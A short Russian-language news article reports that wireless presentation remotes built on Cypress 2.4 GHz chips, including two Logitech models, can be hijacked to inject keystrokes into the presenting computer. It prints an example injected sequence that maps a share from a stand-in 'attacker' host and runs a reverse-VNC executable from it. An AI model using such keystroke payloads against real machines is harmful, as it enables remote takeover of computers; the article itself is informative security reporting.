Если вам приходится выступать с презентациями перед большой аудиторией — будьте осторожны! Хакеры нашли способ удалённого взлома радиопультов для презентаций, так что теперь любой злоумышленник может перехватить управление пультом прямо во время вашего выступления. Хуже того, через пульт можно передавать нажатия клавиш, которые будут исполнены на презентационном компьютере.1. [Win+R]
2. net use X: http:// attacker/webdavshare
3. X:\VNCconnectback.exe
4. [enter]
Техника уже успешно проверена на пультах Logitech R-R0001 и Logitech R400 (на фото), но уязвимости подвержены и другие пульты, где используются стандартные микросхемы производства Cypress Semiconductors.
За последние пару лет опубликован большой объём литературы по безопасности радиоустройств. Известно, что 27-герцовую радиоклавиатуру можно прослушивать с помощью простого прибора, собранного в домашних условиях. Клавиатуры 2,4 ГГц взломали только в конце прошлого года. А теперь пришла очередь 2,4 ГГц устройств для управления презентациями, которые по своему принципу работы не отличаются от клавиатур. Практически во всех таких девайсах используется один и тот же 2,4-гигагерцовый чип CYRF6936 или CYRF69103 производства Cypress Semiconductors, работающий через проприетарный беспроводной протокол.
Прибор для перехвата сигнала можно сконструировать из конструктора Arduino и беспроводного модуля стоимостью 30 евро.
